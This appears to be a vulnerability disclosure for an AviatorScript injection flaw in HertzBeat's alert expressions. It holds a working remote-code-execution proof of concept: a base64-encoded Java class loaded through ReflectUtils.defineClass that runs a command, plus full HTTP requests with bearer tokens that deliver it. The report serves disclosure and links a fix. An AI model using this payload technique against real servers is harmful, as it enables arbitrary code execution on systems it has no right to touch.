AviatorScript Inject RCE

[AfterSnows]

Description

Version of the vulnerability

<=0.1.0

In CalculateAlarm.java, AviatorEvaluator is used to directly execute expression functionality without any configured security policies, leading to potential AviatorScript injection vulnerabilities (which by default can execute arbitrary static methods).

Description of the vulnerability.

For example, running the following AviatorScript script can lead to executing a command that pops up the calculator on Linux.

use org.springframework.util.ClassUtils;let loader = ClassUtils.getDefaultClassLoader();use org.springframework.util.Base64Utils;let str = Base64Utils.decodeFromString('yv66vgAAADQAIQoABwAUCgAVABYIABcKABUAGAcAGQcAGgcAGwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTGE7AQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAZAQAKU291cmNlRmlsZQEABmEuamF2YQwACAAJBwAcDAAdAB4BABBnbm9tZS1jYWxjdWxhdG9yDAAfACABABNqYXZhL2xhbmcvRXhjZXB0aW9uAQABYQEAEGphdmEvbGFuZy9PYmplY3QBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABgAHAAAAAAACAAEACAAJAAEACgAAAC8AAQABAAAABSq3AAGxAAAAAgALAAAABgABAAAAAwAMAAAADAABAAAABQANAA4AAAAIAA8ACQABAAoAAABPAAIAAQAAAA64AAISA7YABFenAARLsQABAAAACQAMAAUAAwALAAAAEgAEAAAABgAJAAgADAAHAA0ACQAMAAAAAgAAABAAAAAHAAJMBwARAAABABIAAAACABM');use org.springframework.cglib.core.ReflectUtils;ReflectUtils.defineClass('a',str,loader);

Steps to execute the vulnerability.

Access /api/alert/define to define threshold triggering expressions.

POST /api/alert/define HTTP/1.1
Host: xxxx:1159
Accept-Language: zh-CN,zh;q=0.9
Cookie: Admin-Token=eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJwljEsOwjAMRO_idSPVTYqTXgWxSFqDwqdFcYKQEHfHFct5M28-cK0ZJjhHGx1SMv28kHE9WuPDwZswB0uJ3ICYoANpScexXJpoyiKapBVeWcTU7carES4vLnsbK0xIGJwfA7oO-P38g5EGu4Oy3VkfjhCXR15VaSrD6fsDVnorAg.6OLcf8mmWvIc3kO8Y_pw5ayAjPy7tGEHRI4P6YE-uRgMiQx6Tq4XD78ceMvK3pkndtuvYNCD-JLXA6dQWWBdpA
Content-Type: application/json
Origin: http://xxxx:1159
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJwljEsOwjAMRO_idSPVTYqTXgWxSFqDwqdFcYKQEHfHFct5M28-cK0ZJjhHGx1SMv28kHE9WuPDwZswB0uJ3ICYoANpScexXJpoyiKapBVeWcTU7carES4vLnsbK0xIGJwfA7oO-P38g5EGu4Oy3VkfjhCXR15VaSrD6fsDVnorAg.6OLcf8mmWvIc3kO8Y_pw5ayAjPy7tGEHRI4P6YE-uRgMiQx6Tq4XD78ceMvK3pkndtuvYNCD-JLXA6dQWWBdpA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Content-Length: 1155

{"cascadeValues":["mysql","status","com_insert"],"app":"mysql","metric":"status","field":"com_insert","preset":true,"expr":"use org.springframework.util.ClassUtils;let loader = ClassUtils.getDefaultClassLoader();use org.springframework.util.Base64Utils;let str = Base64Utils.decodeFromString('yv66vgAAADQAIQoABwAUCgAVABYIABcKABUAGAcAGQcAGgcAGwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTGE7AQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAZAQAKU291cmNlRmlsZQEABmEuamF2YQwACAAJBwAcDAAdAB4BABBnbm9tZS1jYWxjdWxhdG9yDAAfACABABNqYXZhL2xhbmcvRXhjZXB0aW9uAQABYQEAEGphdmEvbGFuZy9PYmplY3QBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABgAHAAAAAAACAAEACAAJAAEACgAAAC8AAQABAAAABSq3AAGxAAAAAgALAAAABgABAAAAAwAMAAAADAABAAAABQANAA4AAAAIAA8ACQABAAoAAABPAAIAAQAAAA64AAISA7YABFenAARLsQABAAAACQAMAAUAAwALAAAAEgAEAAAABgAJAAgADAAHAA0ACQAMAAAAAgAAABAAAAAHAAJMBwARAAABABIAAAACABM');use org.springframework.cglib.core.ReflectUtils;ReflectUtils.defineClass('a',str,loader);","priority":2,"times":10,"enable":true,"template":"${com_insert}"}

Access /api/monitor to add website monitoring.

POST /api/monitor HTTP/1.1
Host: xxxx:1159
Accept-Encoding: gzip, deflate
Content-Type: application/json
Cookie: Admin-Token=eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJwljNsOwiAQRP9ln0sC5Vb6K6YPW7sYvFDDgjEx_rs0Ps6ZOfOBa00wgx5DDOe4CYuohHG4CjRWCZRaSxy9dXGCAbitfYzl0rinxNwTt0KZmEXdb5QFU3lROVqsMCuvgpmM83IAej__wHolD1D2O_WHE-D2SLkrrcuwfH-U9yuC.3gQ-tWEyNzo9ObMXH3R_MF2B13n4oDYQikHBoShg219qEJ-txLjV5Bd9DHOQTIHNT4ojZfEONl-cx-g7xmOUAw
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Referer: http://172.20.10.5:1159/
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJwljNsOwiAQRP9ln0sC5Vb6K6YPW7sYvFDDgjEx_rs0Ps6ZOfOBa00wgx5DDOe4CYuohHG4CjRWCZRaSxy9dXGCAbitfYzl0rinxNwTt0KZmEXdb5QFU3lROVqsMCuvgpmM83IAej__wHolD1D2O_WHE-D2SLkrrcuwfH-U9yuC.3gQ-tWEyNzo9ObMXH3R_MF2B13n4oDYQikHBoShg219qEJ-txLjV5Bd9DHOQTIHNT4ojZfEONl-cx-g7xmOUAw
Origin: http://172.20.10.5:1159
Content-Length: 376

{"monitor":{"name":"2","intervals":600,"tags":[],"description":"1","app":"mysql","host":"localhost"},"params":[{"field":"host","value":"localhost"},{"field":"port","value":"3306"},{"field":"timeout","value":"6000"},{"field":"database","value":"test"},{"field":"username","value":"t"},{"field":"password","value":"123456"},{"field":"url","value":"localhost"}],"detected":true}

Perform operations to trigger monitoring. For example, here I select MySQL's insert operation to trigger monitoring.

Vulnerability validation

Task List

No response

[AfterSnows]

Suggestions on how to fix this vulnerability: https://github.com/apache/hertzbeat/commit/8dcf050e27ca95d15460a7ba98a3df8a9cd1d3d2